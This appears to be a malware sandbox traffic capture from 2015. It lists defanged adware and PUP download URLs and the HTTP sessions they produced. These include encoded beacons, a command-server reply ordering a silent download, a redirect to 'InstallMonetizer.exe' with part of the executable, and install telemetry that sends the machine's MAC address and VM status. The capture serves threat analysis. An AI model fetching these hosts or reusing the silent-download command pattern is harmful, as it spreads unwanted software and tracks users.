hxxp://dildmbfdhsxh6.cloudfront.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81
hxxp://s3.zawss.info/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132	54.231.18.192
hxxp://cdn.austries.com/up/v/update	64.233.166.121
hxxp://s.xcodelib.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81	54.230.200.28
hxxp://s10100019.xcodelib.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81	54.230.200.81
hxxp://www.cojun15cart.com/download.php?kHmDdWc=	23.22.255.164
hxxp://s.xcodelib.net/core/ammapp.js?x=1&cb=1441686154118&yt=81	54.230.200.28
hxxp://secured.nmsgv.us/testadsreel_10656.exe	69.16.175.42
hxxp://s.xcodelib.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81	54.230.200.28
hxxp://s.xcodelib.net/core/lgv.js?r=9&cb=1441686154352&yt=81	54.230.200.28
hxxp://cdn.austries.com/rp/v/image.jpg	64.233.166.121
hxxp://s3.zawss.info/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132	54.231.18.192
hxxp://s3.zawss.info/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141	54.231.18.192
hxxp://www.fcesneim.us/FCL_Co_Unq_remote_v5.php	50.97.62.154
hxxp://s.xcodelib.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81	54.230.200.28
hxxp://s.xcodelib.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81	54.230.200.28
hxxp://cdn.austries.com/wrp/ri	64.233.166.121
hxxp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip	69.16.175.42
hxxp://s.xcodelib.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81	54.230.200.28
hxxp://secured.nmsgv.us/os/rm/OfferScreen_422.zip	69.16.175.42
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php	50.97.62.154
www.xcodelib.net	107.21.244.247

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /download.php?kHmDdWc= HTTP/1.1

Host: VVV.cojun15cart.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Date: Tue, 08 Sep 2015 04:22:23 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Cache-Control: no-cache, must-revalidate

Content-Disposition: attachment; filename="InstallMonetizer.exe"

Location: hXXp://secured.nmsgv.us/testadsreel_10656.exe

Content-Length: 0

Connection: close

Content-Type: text/html; charset=UTF-8

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 400

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1J&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:17 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:17 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....

POST /up/v/update HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 420

Connection: Keep-Alive

key=jZKJflaOiX16jX4/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT97joJ9VkpJST+QhI2GVkpNP4WNhlZJUXhJUnhJUHhLS3hLTz98e1ZKTU1KT1FPSk1PP5FWTUlR&x=1

HTTP/1.1 200 OK

Content-type: text/plain

Date: Tue, 08 Sep 2015 04:22:22 GMT

Server: Google Frontend

Cache-Control: private

Accept-Ranges: none

Vary: Accept-Encoding

Transfer-Encoding: chunked

86..<runonce><runid>4006WIM20150908</runid><silent>yes</silent><url>hXXp://VVV.cojun15cart.com/download.php?kHmDdWc=</url></runonce>....0..HTTP/1.1 200 OK..Content-type: text/plain..Date: Tue, 08 Sep 2015 04:22:22 GMT..Server: Google Frontend..Cache-Control: private..Accept-Ranges: none..Vary: Accept-Encoding..Transfer-Encoding: chunked..86..<runonce><runid>4006WIM20150908</runid><silent>yes</silent><url>hXXp://VVV.cojun15cart.com/download.php?kHmDdWc=</url></runonce>....0..

GET /core/ammapp.js?x=1&cb=1441686154118&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 1470

Connection: keep-alive

Date: Mon, 07 Sep 2015 20:21:16 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 20:21:16 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 29217

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: OUjlVNVWrwWqS5UHlwhs6jHawXq6NVa9ifQH-SpoIt0RqZCClnuX6A==

...........WkS.8.. A....8...WeX^...-.mg:..,...........{%..CB.e..K:..s_bDD..../../.F...Q.9.(.w.....9............C......i.i..........O."..~H..;|....AW..~oo.|....Q.|..{.;..L...S}......S.].<.S........L.e..I.S...c6.......8.J...O.C..{....{.t._..{......d6.D..U.....3e.o...\<..L.m.O...d.}...@.....v#.m4...I..).....I..{_...;r.Vh.l.R>.B....h~...^G].....@.....6.>\Q?.=%...$)...1..c...\.L.......^.d.%......I.._4.or......x.J'....P...N.j.u....4KC._.F.......-..1....... ..i~70B......B..d.... .bs..Z}..:.g..o...|...L....5.D~8..uz.Uq..r.u....B...U.....u....e'9\.b.....K..#.^D\~N.(N...0..:!...?"7.i$..i.....7......~..m.zZ.:...A&U.k....6n......?.D...%.....U..2....R..@.^......g.N...y..N^.P..q,.5.?...m......"....|..../.l..I.;.. D.Qu... .`.-...,..Vf.._......L.........I.Z.`i.q...2.............1*a..q.....2#.x[m=.9w.<..4DBI....$...........\P....s..>..l....).>....).........<....U3..R.(....F.4.nn.... EJ.......).....).U... ..s........{..;....0..J".A.(..Z...r...|.:S.k..........;....{....8..m#?..9...C'..<`..1.<<=....1.......;.u...u....t.C....6.R.....>...w.!........5.4...l....{....*........r.Z....9......n.Sf..)]..D..........]f.u...E.....7..=.,.qBhg.&..Z 0...wu.@.....^...3.9..LA..])......&%.e/..\../.^.$ .....R..z|MBh.....s` O..V'....9z.5z.Y....'Y.P..O....'...$'.....o...f.M..o...F..V.tKE.....Si..U..v..4*.$Lp_.U...s;.........}.._.a....1.N.c.5..*...j..4Q.7.R..............TQ.....M...2fk$V...U!?..D.].<a....?P...P%IZ`',..J.w...L.C?...tH....].).4k.h |X'.z....h.6!?!^..d.....hK3..k.N....X..........

<<< skipped >>>

GET /core/lgv.js?r=9&cb=1441686154352&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 102

Connection: keep-alive

Date: Tue, 08 Sep 2015 04:20:57 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=900

Expires: Tue, 08 Sep 2015 04:35:57 GMT

Content-Encoding: gzip

Age: 437

Vary: Accept-Encoding

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 55gZ6s2yXPBD0WAPSlZdaNfJROtUR5fnPbuRP_a2P5C-uuxRG3anAQ==

...........H .K........)....O../.U2LML3II.4251NK3N1NI.4I3.44.0M4.0OLR...MN#NumrbIr.F.fum....5.$...z.......

GET /core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 3070

Connection: keep-alive

Date: Mon, 07 Sep 2015 12:57:48 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 12:57:48 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 55825

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: YknyOl6Reueyt-IqpzowiZxk9Ed0BKy261VruzTlyP3kGbOikTYnoA==

............is......>..hJr.g...W.6...$.$.......=...(....x.9...C......^.Kw4.Y.q.V.kq.D..D. ...X$..>|9..."viz@...`.......N)....,.X.ON./'......o...~.....g..?{.7"c..0..d..O..ON.s...~...tf..............EZ....od.Z ...J.x0X...=...#.N...V..y8?Z9_...u...1..D..z........x&..4..k.9O.....X..i.q.f<..........\d..?..k......E..k~/.a......O.......N@u.".M.2.A[8.M.r..V.....4^p.H6...4......tC..Y....c...Q.B.3...-O.oZ..Z...X(. r.?O..........g.:.....(Q<.G......e..S"............U....o...F..EK.wX....E*'.~...@@.RAO?N..!...b..X.5....>...Z.8$..G......e..........L.\....%U}.^....d6..k.....#.R.AT.l...~..6.......A...45.>.#}C...D...i.......M.r.4.f..}..)..S... *....,m~....~....3....^..P.)]h.....?..x.W...s.........]s..5\d.S..u.6.h..6.u...9O.....E;w{......6nQ.....!.g...u|i....... ......u2!.. ..YW........?'.. ...krFPI...v.....o.8....poT....*.*..C..yZ......G....S.. .H..U......$......._2.....w]..X..W....n%.T.......N~I.......A.X.4.;.1D6............1Ad-./m!..wlYPos-./1&.^....<.....i.NG..CpU.........%.mD..X........8.......4.K.}...L.t..$.Ri31...G..-_9.9..|~.(qo....=.r..>.1.H.3...H...U..Q.E1..z..E.e:.j.f..l........A...o...9...x)....G....E.."...=.x"m)^.%OOh......p.R.T*K...mk..,.-..w..0..62...3..4j!..nF.W0x.ys.......9./H.....~E=...o......f......@g.......!. .:'.[2.X..S.F....6.=(...u.l]..`..%..@JH..U.u......|;..."r.S...V.*.5@...~...........H....Y.K....3T5..,..1;^].@..2....6..H..w....'.c........W..~........ *A.X...HYYB>Dl.%....vQ...ZM..a#..Z>...q.H(X.b...l.f2....Z.....JL3yQX.B....2....D.Phv......p....../...F".3.#.....J.J})].......

<<< skipped >>>

GET /core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 216

Connection: keep-alive

Date: Tue, 08 Sep 2015 03:55:24 GMT

Server: Apache

X-Powered-By: PHP/5.3.3

Cache-Control: maxage=10800

Expires: Tue, 08 Sep 2015 06:55:24 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 1970

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: VsqRng2sy7iGQK1Y0hvzBfI1kcGHi3wzFTr2P2B2lRQWqTdNo7eL5A==

............=..0....W..l..UG. UPp.q...m.....R..w?..T....{x...P. S. .mf<.J...<..F........T.._.b..6.<.......F.|g ;...K.......i@...QT$........./u...h/6{..NN.%}....'........4.RV..8.s^............./.v...........\oV.7.........

GET /core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8

Content-Length: 151

Connection: keep-alive

Date: Tue, 08 Sep 2015 04:26:25 GMT

Server: Apache

Accept-Ranges: bytes

Content-Encoding: gzip

Age: 110

Vary: Accept-Encoding

X-Cache: Error from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nUKE1JrK9pKlJThHr6gzXX1elOtb_Hm8J0WVvImSrma9VEWf3AcPNA==

..........5....0.D.........V.f._P...l[.-...H<M&yy3j.@M.&.CS.@.d...|.g.....v.q..Rd........s...R..f....KA...=.6......;........z.....J.}\.ixo...k.[...........

GET /amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript

Content-Length: 136

Connection: keep-alive

Date: Mon, 07 Sep 2015 05:23:18 GMT

Server: Apache

Accept-Ranges: bytes

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 05:23:18 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 83095

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: rDjR3EpN1bKBLx_9rc8RKRlDTjekxDM7_K9zG9kRxzXlpy9ZbBwDCQ==

..........U....!...%<.l..K.........W.|[B......f..f....^Rxjjf...F._.u.6...qc^N.U5[...*.Cw.gP..1`.1j.......>:...3.{...^l....>.?9}.{.m.........

GET /amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8

Content-Length: 1547

Connection: keep-alive

Date: Tue, 08 Sep 2015 04:28:15 GMT

Server: Apache

X-Powered-By: PHP/5.3.3

Expires: Tue, 08 Sep 2015 04:28:15 GMT

Cache-Control: max-age=0

Content-Encoding: gzip

Vary: Accept-Encoding

X-Cache: Miss from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: bgnnClCiMBQoS66pM0HzS4SFv6JRlZMcaCIjd79BsUPE3IIPj4-cxg==

...........XYo.8.~n..C`.......^&..#..v.l.}.h.....*.W......,;.[.....).!..83..2.Q..z1......m.7m....c|.....;zw\}.U.U,.C:5m.z.s..o..>. ..w...C...a`B.......E?..>F.gZ..'b..Tn...|..._2C..z&..>W...s.......(.Qc1.......!j..KP....j....>.......z..k..~....v.1B......~uvr|\?>..'X..q.s.Wd.2.....rzx|.l7.[.9gF.^......*.`.O...3 y`...W......WL[2'.7.Z>So...#T.W^...*.[....&..[Z).5.`.p.....u..rR...)mu..pM....(f].$....*R.$L..R..R7Dr..!........{...ysA..y..(.K}..L.....[.ll....Z[.........jl.Z.....>lP.D#:...F.@...@...../.Ca'.,....>.. .........o...9.z..:.......x......K....|'..Oc...8-..~G.........A;....w.D...G#...*.:.b.s....JN.42.em%..>*.~".. ...&..l..P......&..f.I.c. .^..*.....E.5..c...D1p....rKL..w..N"..z..C.......&0.D.!...a...5Y......e!...y.....h~K.....8.wm......k...3..Th..Ec..mW\.f..}...JHU.. ..........V..B.6<.;|.....Tq.....~Y...A..M..8.....6...9.Th..a. V0|OC...k...*....]....!...........@.&...6.S.!.x.d.k.....@..SF&*.l....K..lRR...,.}.w.p.....9......!...i=!.......1j.bN9...d..$o.f%.x....Eu.Z.|[T....5;...(...5...;..F...]9V-/.Y...T.f.fg..6./K.o$go.>E..WY.n..LaP'..G"ozV...^)....F......:.|.'..#./c......sH..B.... '...~...<..y..@6...!.r.;..1pm...\..A..~ D....b.b...(...;9{..|.6O.m[B..:....dI.p@a%hx....V;.E...v"&...!...7{...P`.~C..(5..N.,J.&&=.].....y@....Q,T...@...L..........!KB.`0..2p...K..S.k.^..V.t.9 ...C.p....W..3.......G"..4..DO....4.VSeK.,.m$.qE|.......~..&..j#..W.;............'~..o?./-l|.W.X....l..e...[.i..............n.|.^..0..>.5..;..)_^.......Pu.L...g/............`...,?..#?.).J.xg...VG//.{G(=Kr...

<<< skipped >>>

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 96

Connection: Keep-Alive

key=jZKJflaLST96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSg==&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:00 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:00 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....

POST /wrp/ri HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 126

Connection: Keep-Alive

key=hnp8VklJSVxLUl9dTk5aXT96f3+CfVZKSUpJSUlKUj99jItWh4iHfj+Ji4ZWSUlJXEtSX11OTlpdP4KMj4ZWSj+Pho1WSz98e1ZKTU1KT1FPSktN&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: text; charset=UTF-8

Date: Tue, 08 Sep 2015 04:22:02 GMT

Server: Google Frontend

Content-Length: 4

SklJHTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: text; charset=UTF-8..Date: Tue, 08 Sep 2015 04:22:02 GMT..Server: Google Frontend..Content-Length: 4..SklJ....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 280

Connection: Keep-Alive

key=jZKJflaLjI16i40/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:02 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:02 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 288

Connection: Keep-Alive

key=jZKJflaHjIKMjI16i414gn4/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:04 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 280

Connection: Keep-Alive

key=jZKJflaOh3+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:05 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:05 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 292

Connection: Keep-Alive

key=jZKJflZ+kY2LfI1/goeCjIE/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:05 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:05 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 284

Connection: Keep-Alive

key=jZKJflaHjIKMeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:15 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:15 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;..

GET /testadsreel_10656.exe HTTP/1.1

Host: secured.nmsgv.us

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:23 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441631504"

Last-Modified: Mon, 07 Sep 2015 13:11:44 GMT

Cache-Control: max-age=32721

Content-Length: 228307

Content-Type: application/octet-stream

X-HW: 1441686143.dop009.fr7.t,1441686143.cds015.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^....... ...0.......p....@..........................`1..............................................t....... 1..?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X............v..............@....ndata....,.. ...........................rsrc....?... 1..@...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.E..H.P.u..u..u...Hr@..B...SV.5p.E..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

GET /client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1

Host: s3.zawss.info

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=

x-amz-request-id: 3DEF045CAF143D99

Date: Tue, 08 Sep 2015 04:22:10 GMT

Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT

ETag: "d152c08a253fe1bd8ede751d571ac800"

Accept-Ranges: bytes

Content-Type: text/html

Content-Length: 36

Server: AmazonS3

<html>..<body>..ok..</body>..</html>HTTP/1.1 200 OK..x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=..x-amz-request-id: 3DEF045CAF143D99..Date: Tue, 08 Sep 2015 04:22:10 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<html>..<body>..ok..</body>..</html>..

